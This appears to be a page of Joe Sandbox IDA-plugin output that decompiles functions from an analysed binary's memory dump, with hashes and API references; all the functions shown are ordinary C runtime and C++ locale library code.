Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: bac27c39fbe43d499829f93972b7062a5d7a487ae5d6051503353af43bd67f14
Instruction ID: f70dd3fdd295d74764ac1c39f6ccfa732eb4ec65f5d62317e351614903cfed42
Opcode Fuzzy Hash: bac27c39fbe43d499829f93972b7062a5d7a487ae5d6051503353af43bd67f14
Instruction Fuzzy Hash: F021AA72B002189FD720DFD9E885BAFF7F9FF59321F114226E605A7280D73069958790

Uniqueness

Uniqueness Score: -1.00%

Function 01355B37, Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E01355B37(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x13a4200; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E013561F6(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E01355C32(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E013561F6(__eflags,  *0x13a4200, _t18);
							if(__eflags != 0) {
								E0135580E(_t18, 0x13ab4a8);
								E01355C8F(0);
								goto L13;
							} else {
								_t13 = 0;
								E013561F6(__eflags,  *0x13a4200, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E013561F6(0,  *0x13a4200, 0);
							_push(0);
							L9:
							E01355C8F();
							goto L4;
						}
					}
				} else {
					_t18 = E013561B7(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x13a4200; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x01355b42
0x01355b44
0x01355b49
0x01355b4c
0x01355b6a
0x01355b6d
0x01355b72
0x01355b74
0x00000000
0x01355b76
0x01355b82
0x01355b86
0x01355b88
0x01355bad
0x01355baf
0x01355bc8
0x01355bcf
0x00000000
0x01355bb1
0x01355bb1
0x01355bba
0x01355bbf
0x00000000
0x01355bbf
0x01355b8a
0x01355b8a
0x01355b8a
0x01355b93
0x01355b98
0x01355b99
0x01355b99
0x00000000
0x01355b9e
0x01355b88
0x01355b4e
0x01355b54
0x01355b58
0x01355b65
0x00000000
0x01355b5a
0x01355b5d
0x01355bd7
0x01355bd7
0x01355b5f
0x01355b5f
0x01355b5f
0x01355b61
0x01355b61
0x01355b61
0x01355b5d
0x01355b58
0x01355bda
0x01355be2
0x01355beb

APIs

GetLastError.KERNEL32(?,?,?,0134B464,01355CB5,?,?,013535B4), ref: 01355B3C
_free.LIBCMT ref: 01355B99
_free.LIBCMT ref: 01355BCF
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0134B464,01355CB5,?,?,013535B4), ref: 01355BDA

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 9d94900bdb31bd4965e7ab00fadae3804234885268f751e77ef5f9e328a92e12
Instruction ID: fd96aa6091b2f32eb28b3286245e5a4b8288f37e9831cf462dfedbf2189802ae
Opcode Fuzzy Hash: 9d94900bdb31bd4965e7ab00fadae3804234885268f751e77ef5f9e328a92e12
Instruction Fuzzy Hash: E9116F723003066AEFE1267CBC89D77366DABD0F7DB690234FE26921C6DF609C014660

Uniqueness

Uniqueness Score: -1.00%

Function 0132B132, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0132B132(void* __eflags, void* __fp0) {
				signed int _t83;
				void* _t143;
				signed int _t210;
				void* _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				void* _t249;

				_t253 = __fp0;
				_push(8);
				E0132F1B6(0x1368615, __eflags);
				E013177B6(_t249 - 0x14, 0);
				_t236 =  *0x13aaaa8; // 0x0
				 *(_t249 - 4) =  *(_t249 - 4) & 0x00000000;
				 *(_t249 - 0x10) = _t236;
				_t83 = E012F9A10( *((intOrPtr*)(_t249 + 8)), E012F9850(0x13aaa88));
				_t230 = _t83;
				if(_t83 != 0) {
					L5:
					E0131780E(_t249 - 0x14);
					return E0132F190(_t230, _t252);
				} else {
					_t252 = _t236;
					if(_t236 == 0) {
						_push( *((intOrPtr*)(_t249 + 8)));
						_push(_t249 - 0x10);
						__eflags = E0132B6C1(_t236, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E012F9060();
							asm("int3");
							_push(8);
							E0132F1B6(0x1368615, __eflags);
							E013177B6(_t249 - 0x14, 0);
							_t237 =  *0x13aaaac; // 0x0
							 *(_t249 - 4) =  *(_t249 - 4) & 0x00000000;
							 *(_t249 - 0x10) = _t237;
							_t231 = E012F9A10( *((intOrPtr*)(_t249 + 8)), E012F9850(0x13aaa8c));
							__eflags = _t231;
							if(_t231 != 0) {
								L12:
								E0131780E(_t249 - 0x14);
								return E0132F190(_t231, __eflags);
							} else {
								__eflags = _t237;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t249 + 8)));
									_push(_t249 - 0x10);
									__eflags = E0132B729(_t237, __eflags) - 0xffffffff;
									if(__eflags == 0) {
										E012F9060();
										asm("int3");
										_push(8);
										E0132F1B6(0x1368615, __eflags);
										E013177B6(_t249 - 0x14, 0);
										_t238 =  *0x13aaab4; // 0x0
										 *(_t249 - 4) =  *(_t249 - 4) & 0x00000000;
										 *(_t249 - 0x10) = _t238;
										_t232 = E012F9A10( *((intOrPtr*)(_t249 + 8)), E012F9850(0x13aaa94));
										__eflags = _t232;
										if(_t232 != 0) {
											L19:
											E0131780E(_t249 - 0x14);
											return E0132F190(_t232, __eflags);
										} else {
											__eflags = _t238;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t249 + 8)));
												_push(_t249 - 0x10);
												__eflags = E0132B791(_t238, __eflags, __fp0) - 0xffffffff;
												if(__eflags == 0) {
													E012F9060();
													asm("int3");
													_push(8);
													E0132F1B6(0x1368615, __eflags);
													E013177B6(_t249 - 0x14, 0);
													_t239 =  *0x13aaab0; // 0x0
													 *(_t249 - 4) =  *(_t249 - 4) & 0x00000000;
													 *(_t249 - 0x10) = _t239;
													_t233 = E012F9A10( *((intOrPtr*)(_t249 + 8)), E012F9850(0x13aaa90));
													__eflags = _t233;
													if(_t233 != 0) {
														L26:
														E0131780E(_t249 - 0x14);
														return E0132F190(_t233, __eflags);
													} else {
														__eflags = _t239;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t249 + 8)));
															_push(_t249 - 0x10);
															__eflags = E0132B815(_t239, __eflags, __fp0) - 0xffffffff;
															if(__eflags == 0) {
																E012F9060();
																asm("int3");
																_push(8);
																E0132F1B6(0x1368615, __eflags);
																E013177B6(_t249 - 0x14, 0);
																_t240 =  *0x13aaab8; // 0x0
																 *(_t249 - 4) =  *(_t249 - 4) & 0x00000000;
																 *(_t249 - 0x10) = _t240;
																_t234 = E012F9A10( *((intOrPtr*)(_t249 + 8)), E012F9850(0x13aaa98));
																__eflags = _t234;
																if(_t234 != 0) {
																	L33:
																	E0131780E(_t249 - 0x14);
																	return E0132F190(_t234, __eflags);
																} else {
																	__eflags = _t240;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t249 + 8)));
																		_push(_t249 - 0x10);
																		__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
																		if(__eflags == 0) {
																			E012F9060();
																			asm("int3");
																			_push(8);
																			E0132F1B6(0x1368615, __eflags);
																			E013177B6(_t249 - 0x14, 0);
																			_t241 =  *0x13aaabc; // 0x0
																			 *(_t249 - 4) =  *(_t249 - 4) & 0x00000000;
																			 *(_t249 - 0x10) = _t241;
																			_t235 = E012F9A10( *((intOrPtr*)(_t249 + 8)), E012F9850(0x13aaa9c));
																			__eflags = _t235;
																			if(_t235 != 0) {
																				L40:
																				E0131780E(_t249 - 0x14);
																				return E0132F190(_t235, __eflags);
																			} else {
																				__eflags = _t241;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t249 + 8)));
																					_push(_t249 - 0x10);
																					_t143 = E0132B906(_t229, _t241, __eflags);
																					_pop(_t210);
																					__eflags = _t143 - 0xffffffff;
																					if(__eflags == 0) {
																						E012F9060();
																						asm("int3");
																						_push(4);
																						E0132F1B6(0x1368ad3, __eflags);
																						_t242 = _t210;
																						 *(_t249 - 0x10) = _t242;
																						 *((intOrPtr*)(_t242 + 4)) =  *((intOrPtr*)(_t249 + 0xc));
																						_push( *((intOrPtr*)(_t249 + 8)));
																						_t77 = _t249 - 4;
																						 *_t77 =  *(_t249 - 4) & 0x00000000;
																						__eflags =  *_t77;
																						 *_t242 = 0x1376c58;
																						E0132C81A(_t210, _t229, __eflags, _t253);
																						return E0132F190(_t242, __eflags);
																					} else {
																						_t235 =  *(_t249 - 0x10);
																						 *(_t249 - 0x10) = _t235;
																						 *(_t249 - 4) = 1;
																						E0131792B(__eflags, _t235);
																						 *0x1374358();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t235 + 4))))();
																						 *0x13aaabc = _t235;
																						goto L40;
																					}
																				} else {
																					_t235 = _t241;
																					goto L40;
																				}
																			}
																		} else {
																			_t234 =  *(_t249 - 0x10);
																			 *(_t249 - 0x10) = _t234;
																			 *(_t249 - 4) = 1;
																			E0131792B(__eflags, _t234);
																			 *0x1374358();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t234 + 4))))();
																			 *0x13aaab8 = _t234;
																			goto L33;
																		}
																	} else {
																		_t234 = _t240;
																		goto L33;
																	}
																}
															} else {
																_t233 =  *(_t249 - 0x10);
																 *(_t249 - 0x10) = _t233;
																 *(_t249 - 4) = 1;
																E0131792B(__eflags, _t233);
																 *0x1374358();
																 *((intOrPtr*)( *((intOrPtr*)( *_t233 + 4))))();
																 *0x13aaab0 = _t233;
																goto L26;
															}
														} else {
															_t233 = _t239;
															goto L26;
														}
													}
												} else {
													_t232 =  *(_t249 - 0x10);
													 *(_t249 - 0x10) = _t232;
													 *(_t249 - 4) = 1;
													E0131792B(__eflags, _t232);
													 *0x1374358();
													 *((intOrPtr*)( *((intOrPtr*)( *_t232 + 4))))();
													 *0x13aaab4 = _t232;
													goto L19;
												}
											} else {
												_t232 = _t238;
												goto L19;
											}
										}
									} else {
										_t231 =  *(_t249 - 0x10);
										 *(_t249 - 0x10) = _t231;
										 *(_t249 - 4) = 1;
										E0131792B(__eflags, _t231);
										 *0x1374358();
										 *((intOrPtr*)( *((intOrPtr*)( *_t231 + 4))))();
										 *0x13aaaac = _t231;
										goto L12;
									}
								} else {
									_t231 = _t237;
									goto L12;
								}
							}
						} else {
							_t230 =  *(_t249 - 0x10);
							 *(_t249 - 0x10) = _t230;
							 *(_t249 - 4) = 1;
							E0131792B(__eflags, _t230);
							 *0x1374358();
							 *((intOrPtr*)( *((intOrPtr*)( *_t230 + 4))))();
							 *0x13aaaa8 = _t230;
							goto L5;
						}
					} else {
						_t230 = _t236;
						goto L5;
					}
				}
			}

0x0132b132
0x0132b132
0x0132b139
0x0132b143
0x0132b148
0x0132b153
0x0132b157
0x0132b163
0x0132b168
0x0132b16c
0x0132b1b1
0x0132b1b4
0x0132b1c0
0x0132b16e
0x0132b16e
0x0132b170
0x0132b176
0x0132b17c
0x0132b184
0x0132b187
0x0132b1c1
0x0132b1c6
0x0132b1c7
0x0132b1ce
0x0132b1d8
0x0132b1dd
0x0132b1e8
0x0132b1ec
0x0132b1fd
0x0132b1ff
0x0132b201
0x0132b246
0x0132b249
0x0132b255
0x0132b203
0x0132b203
0x0132b205
0x0132b20b
0x0132b211
0x0132b219
0x0132b21c
0x0132b256
0x0132b25b
0x0132b25c
0x0132b263
0x0132b26d
0x0132b272
0x0132b27d
0x0132b281
0x0132b292
0x0132b294
0x0132b296
0x0132b2db
0x0132b2de
0x0132b2ea
0x0132b298
0x0132b298
0x0132b29a
0x0132b2a0
0x0132b2a6
0x0132b2ae
0x0132b2b1
0x0132b2eb
0x0132b2f0
0x0132b2f1
0x0132b2f8
0x0132b302
0x0132b307
0x0132b312
0x0132b316
0x0132b327
0x0132b329
0x0132b32b
0x0132b370
0x0132b373
0x0132b37f
0x0132b32d
0x0132b32d
0x0132b32f
0x0132b335
0x0132b33b
0x0132b343
0x0132b346
0x0132b380
0x0132b385
0x0132b386
0x0132b38d
0x0132b397
0x0132b39c
0x0132b3a7
0x0132b3ab
0x0132b3bc
0x0132b3be
0x0132b3c0
0x0132b405
0x0132b408
0x0132b414
0x0132b3c2
0x0132b3c2
0x0132b3c4
0x0132b3ca
0x0132b3d0
0x0132b3d8
0x0132b3db
0x0132b415
0x0132b41a
0x0132b41b
0x0132b422
0x0132b42c
0x0132b431
0x0132b43c
0x0132b440
0x0132b451
0x0132b453
0x0132b455
0x0132b49a
0x0132b49d
0x0132b4a9
0x0132b457
0x0132b457
0x0132b459
0x0132b45f
0x0132b465
0x0132b466
0x0132b46c
0x0132b46d
0x0132b470
0x0132b4aa
0x0132b4af
0x0132b4b0
0x0132b4b7
0x0132b4bc
0x0132b4be
0x0132b4c4
0x0132b4c7
0x0132b4ca
0x0132b4ca
0x0132b4ca
0x0132b4ce
0x0132b4d4
0x0132b4e0
0x0132b472
0x0132b472
0x0132b475
0x0132b479
0x0132b47d
0x0132b48a
0x0132b492
0x0132b494
0x00000000
0x0132b494
0x0132b45b
0x0132b45b
0x00000000
0x0132b45b
0x0132b459
0x0132b3dd
0x0132b3dd
0x0132b3e0
0x0132b3e4
0x0132b3e8
0x0132b3f5
0x0132b3fd
0x0132b3ff
0x00000000
0x0132b3ff
0x0132b3c6
0x0132b3c6
0x00000000
0x0132b3c6
0x0132b3c4
0x0132b348
0x0132b348
0x0132b34b
0x0132b34f
0x0132b353
0x0132b360
0x0132b368
0x0132b36a
0x00000000
0x0132b36a
0x0132b331
0x0132b331
0x00000000
0x0132b331
0x0132b32f
0x0132b2b3
0x0132b2b3
0x0132b2b6
0x0132b2ba
0x0132b2be
0x0132b2cb
0x0132b2d3
0x0132b2d5
0x00000000
0x0132b2d5
0x0132b29c
0x0132b29c
0x00000000
0x0132b29c
0x0132b29a
0x0132b21e
0x0132b21e
0x0132b221
0x0132b225
0x0132b229
0x0132b236
0x0132b23e
0x0132b240
0x00000000
0x0132b240
0x0132b207
0x0132b207
0x00000000
0x0132b207
0x0132b205
0x0132b189
0x0132b189
0x0132b18c
0x0132b190
0x0132b194
0x0132b1a1
0x0132b1a9
0x0132b1ab
0x00000000
0x0132b1ab
0x0132b172
0x0132b172
0x00000000
0x0132b172
0x0132b170

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0132B143

Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889

std::_Facet_Register.LIBCPMT ref: 0132B194
std::_Lockit::~_Lockit.LIBCPMT ref: 0132B1B4
Concurrency::cancel_current_task.LIBCPMT ref: 0132B1C1

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 170a8b3d78bff4f59afc09fdac168b6ce08e274257ce503112c393f94d6694ec
Instruction ID: 1a168be6b1f4b5c1f2a8dc69c66a845509f7646d5ae69aa0cf3df1494b4b4c81
Opcode Fuzzy Hash: 170a8b3d78bff4f59afc09fdac168b6ce08e274257ce503112c393f94d6694ec
Instruction Fuzzy Hash: A301F9369002269BDF15FB68C4546BEFBB9EF54328F24000CD51167384DF34AD45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0132B1C7, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0132B1C7(void* __eflags, void* __fp0) {
				signed int _t71;
				void* _t120;
				signed int _t177;
				void* _t193;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				void* _t210;

				_t214 = __fp0;
				_push(8);
				E0132F1B6(0x1368615, __eflags);
				E013177B6(_t210 - 0x14, 0);
				_t199 =  *0x13aaaac; // 0x0
				 *(_t210 - 4) =  *(_t210 - 4) & 0x00000000;
				 *(_t210 - 0x10) = _t199;
				_t71 = E012F9A10( *((intOrPtr*)(_t210 + 8)), E012F9850(0x13aaa8c));
				_t194 = _t71;
				if(_t71 != 0) {
					L5:
					E0131780E(_t210 - 0x14);
					return E0132F190(_t194, _t213);
				} else {
					_t213 = _t199;
					if(_t199 == 0) {
						_push( *((intOrPtr*)(_t210 + 8)));
						_push(_t210 - 0x10);
						__eflags = E0132B729(_t199, __eflags) - 0xffffffff;
						if(__eflags == 0) {
							E012F9060();
							asm("int3");
							_push(8);
							E0132F1B6(0x1368615, __eflags);
							E013177B6(_t210 - 0x14, 0);
							_t200 =  *0x13aaab4; // 0x0
							 *(_t210 - 4) =  *(_t210 - 4) & 0x00000000;
							 *(_t210 - 0x10) = _t200;
							_t195 = E012F9A10( *((intOrPtr*)(_t210 + 8)), E012F9850(0x13aaa94));
							__eflags = _t195;
							if(_t195 != 0) {
								L12:
								E0131780E(_t210 - 0x14);
								return E0132F190(_t195, __eflags);
							} else {
								__eflags = _t200;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t210 + 8)));
									_push(_t210 - 0x10);
									__eflags = E0132B791(_t200, __eflags, __fp0) - 0xffffffff;
									if(__eflags == 0) {
										E012F9060();
										asm("int3");
										_push(8);
										E0132F1B6(0x1368615, __eflags);
										E013177B6(_t210 - 0x14, 0);
										_t201 =  *0x13aaab0; // 0x0
										 *(_t210 - 4) =  *(_t210 - 4) & 0x00000000;
										 *(_t210 - 0x10) = _t201;
										_t196 = E012F9A10( *((intOrPtr*)(_t210 + 8)), E012F9850(0x13aaa90));
										__eflags = _t196;
										if(_t196 != 0) {
											L19:
											E0131780E(_t210 - 0x14);
											return E0132F190(_t196, __eflags);
										} else {
											__eflags = _t201;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t210 + 8)));
												_push(_t210 - 0x10);
												__eflags = E0132B815(_t201, __eflags, __fp0) - 0xffffffff;
												if(__eflags == 0) {
													E012F9060();
													asm("int3");
													_push(8);
													E0132F1B6(0x1368615, __eflags);
													E013177B6(_t210 - 0x14, 0);
													_t202 =  *0x13aaab8; // 0x0
													 *(_t210 - 4) =  *(_t210 - 4) & 0x00000000;
													 *(_t210 - 0x10) = _t202;
													_t197 = E012F9A10( *((intOrPtr*)(_t210 + 8)), E012F9850(0x13aaa98));
													__eflags = _t197;
													if(_t197 != 0) {
														L26:
														E0131780E(_t210 - 0x14);
														return E0132F190(_t197, __eflags);
													} else {
														__eflags = _t202;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t210 + 8)));
															_push(_t210 - 0x10);
															__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
															if(__eflags == 0) {
																E012F9060();
																asm("int3");
																_push(8);
																E0132F1B6(0x1368615, __eflags);
																E013177B6(_t210 - 0x14, 0);
																_t203 =  *0x13aaabc; // 0x0
																 *(_t210 - 4) =  *(_t210 - 4) & 0x00000000;
																 *(_t210 - 0x10) = _t203;
																_t198 = E012F9A10( *((intOrPtr*)(_t210 + 8)), E012F9850(0x13aaa9c));
																__eflags = _t198;
																if(_t198 != 0) {
																	L33:
																	E0131780E(_t210 - 0x14);
																	return E0132F190(_t198, __eflags);
																} else {
																	__eflags = _t203;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t210 + 8)));
																		_push(_t210 - 0x10);
																		_t120 = E0132B906(_t193, _t203, __eflags);
																		_pop(_t177);
																		__eflags = _t120 - 0xffffffff;
																		if(__eflags == 0) {
																			E012F9060();
																			asm("int3");
																			_push(4);
																			E0132F1B6(0x1368ad3, __eflags);
																			_t204 = _t177;
																			 *(_t210 - 0x10) = _t204;
																			 *((intOrPtr*)(_t204 + 4)) =  *((intOrPtr*)(_t210 + 0xc));
																			_push( *((intOrPtr*)(_t210 + 8)));
																			_t65 = _t210 - 4;
																			 *_t65 =  *(_t210 - 4) & 0x00000000;
																			__eflags =  *_t65;
																			 *_t204 = 0x1376c58;
																			E0132C81A(_t177, _t193, __eflags, _t214);
																			return E0132F190(_t204, __eflags);
																		} else {
																			_t198 =  *(_t210 - 0x10);
																			 *(_t210 - 0x10) = _t198;
																			 *(_t210 - 4) = 1;
																			E0131792B(__eflags, _t198);
																			 *0x1374358();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t198 + 4))))();
																			 *0x13aaabc = _t198;
																			goto L33;
																		}
																	} else {
																		_t198 = _t203;
																		goto L33;
																	}
																}
															} else {
																_t197 =  *(_t210 - 0x10);
																 *(_t210 - 0x10) = _t197;
																 *(_t210 - 4) = 1;
																E0131792B(__eflags, _t197);
																 *0x1374358();
																 *((intOrPtr*)( *((intOrPtr*)( *_t197 + 4))))();
																 *0x13aaab8 = _t197;
																goto L26;
															}
														} else {
															_t197 = _t202;
															goto L26;
														}
													}
												} else {
													_t196 =  *(_t210 - 0x10);
													 *(_t210 - 0x10) = _t196;
													 *(_t210 - 4) = 1;
													E0131792B(__eflags, _t196);
													 *0x1374358();
													 *((intOrPtr*)( *((intOrPtr*)( *_t196 + 4))))();
													 *0x13aaab0 = _t196;
													goto L19;
												}
											} else {
												_t196 = _t201;
												goto L19;
											}
										}
									} else {
										_t195 =  *(_t210 - 0x10);
										 *(_t210 - 0x10) = _t195;
										 *(_t210 - 4) = 1;
										E0131792B(__eflags, _t195);
										 *0x1374358();
										 *((intOrPtr*)( *((intOrPtr*)( *_t195 + 4))))();
										 *0x13aaab4 = _t195;
										goto L12;
									}
								} else {
									_t195 = _t200;
									goto L12;
								}
							}
						} else {
							_t194 =  *(_t210 - 0x10);
							 *(_t210 - 0x10) = _t194;
							 *(_t210 - 4) = 1;
							E0131792B(__eflags, _t194);
							 *0x1374358();
							 *((intOrPtr*)( *((intOrPtr*)( *_t194 + 4))))();
							 *0x13aaaac = _t194;
							goto L5;
						}
					} else {
						_t194 = _t199;
						goto L5;
					}
				}
			}

0x0132b1c7
0x0132b1c7
0x0132b1ce
0x0132b1d8
0x0132b1dd
0x0132b1e8
0x0132b1ec
0x0132b1f8
0x0132b1fd
0x0132b201
0x0132b246
0x0132b249
0x0132b255
0x0132b203
0x0132b203
0x0132b205
0x0132b20b
0x0132b211
0x0132b219
0x0132b21c
0x0132b256
0x0132b25b
0x0132b25c
0x0132b263
0x0132b26d
0x0132b272
0x0132b27d
0x0132b281
0x0132b292
0x0132b294
0x0132b296
0x0132b2db
0x0132b2de
0x0132b2ea
0x0132b298
0x0132b298
0x0132b29a
0x0132b2a0
0x0132b2a6
0x0132b2ae
0x0132b2b1
0x0132b2eb
0x0132b2f0
0x0132b2f1
0x0132b2f8
0x0132b302
0x0132b307
0x0132b312
0x0132b316
0x0132b327
0x0132b329
0x0132b32b
0x0132b370
0x0132b373
0x0132b37f
0x0132b32d
0x0132b32d
0x0132b32f
0x0132b335
0x0132b33b
0x0132b343
0x0132b346
0x0132b380
0x0132b385
0x0132b386
0x0132b38d
0x0132b397
0x0132b39c
0x0132b3a7
0x0132b3ab
0x0132b3bc
0x0132b3be
0x0132b3c0
0x0132b405
0x0132b408
0x0132b414
0x0132b3c2
0x0132b3c2
0x0132b3c4
0x0132b3ca
0x0132b3d0
0x0132b3d8
0x0132b3db
0x0132b415
0x0132b41a
0x0132b41b
0x0132b422
0x0132b42c
0x0132b431
0x0132b43c
0x0132b440
0x0132b451
0x0132b453
0x0132b455
0x0132b49a
0x0132b49d
0x0132b4a9
0x0132b457
0x0132b457
0x0132b459
0x0132b45f
0x0132b465
0x0132b466
0x0132b46c
0x0132b46d
0x0132b470
0x0132b4aa
0x0132b4af
0x0132b4b0
0x0132b4b7
0x0132b4bc
0x0132b4be
0x0132b4c4
0x0132b4c7
0x0132b4ca
0x0132b4ca
0x0132b4ca
0x0132b4ce
0x0132b4d4
0x0132b4e0
0x0132b472
0x0132b472
0x0132b475
0x0132b479
0x0132b47d
0x0132b48a
0x0132b492
0x0132b494
0x00000000
0x0132b494
0x0132b45b
0x0132b45b
0x00000000
0x0132b45b
0x0132b459
0x0132b3dd
0x0132b3dd
0x0132b3e0
0x0132b3e4
0x0132b3e8
0x0132b3f5
0x0132b3fd
0x0132b3ff
0x00000000
0x0132b3ff
0x0132b3c6
0x0132b3c6
0x00000000
0x0132b3c6
0x0132b3c4
0x0132b348
0x0132b348
0x0132b34b
0x0132b34f
0x0132b353
0x0132b360
0x0132b368
0x0132b36a
0x00000000
0x0132b36a
0x0132b331
0x0132b331
0x00000000
0x0132b331
0x0132b32f
0x0132b2b3
0x0132b2b3
0x0132b2b6
0x0132b2ba
0x0132b2be
0x0132b2cb
0x0132b2d3
0x0132b2d5
0x00000000
0x0132b2d5
0x0132b29c
0x0132b29c
0x00000000
0x0132b29c
0x0132b29a
0x0132b21e
0x0132b21e
0x0132b221
0x0132b225
0x0132b229
0x0132b236
0x0132b23e
0x0132b240
0x00000000
0x0132b240
0x0132b207
0x0132b207
0x00000000
0x0132b207
0x0132b205

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0132B1D8

Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889

std::_Facet_Register.LIBCPMT ref: 0132B229
std::_Lockit::~_Lockit.LIBCPMT ref: 0132B249
Concurrency::cancel_current_task.LIBCPMT ref: 0132B256

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 0e4fd312cb4e2c76a596e526dcd77c920c8830883197022a99e617c30758631d
Instruction ID: df9a6872084aabefc83720aa483c7c0e0242a0f6053c330f80e913d8979c1e22
Opcode Fuzzy Hash: 0e4fd312cb4e2c76a596e526dcd77c920c8830883197022a99e617c30758631d
Instruction Fuzzy Hash: 1301D6369003268BDF16FFA8C4546BEF7B9AF94318F280048E51167284DF349905CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0132B386, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0132B386(void* __eflags, void* __fp0) {
				signed int _t35;
				void* _t51;
				signed int _t78;
				void* _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t90;
				void* _t93;

				_push(8);
				E0132F1B6(0x1368615, __eflags);
				E013177B6(_t93 - 0x14, 0);
				_t88 =  *0x13aaab8; // 0x0
				 *(_t93 - 4) =  *(_t93 - 4) & 0x00000000;
				 *(_t93 - 0x10) = _t88;
				_t35 = E012F9A10( *((intOrPtr*)(_t93 + 8)), E012F9850(0x13aaa98));
				_t86 = _t35;
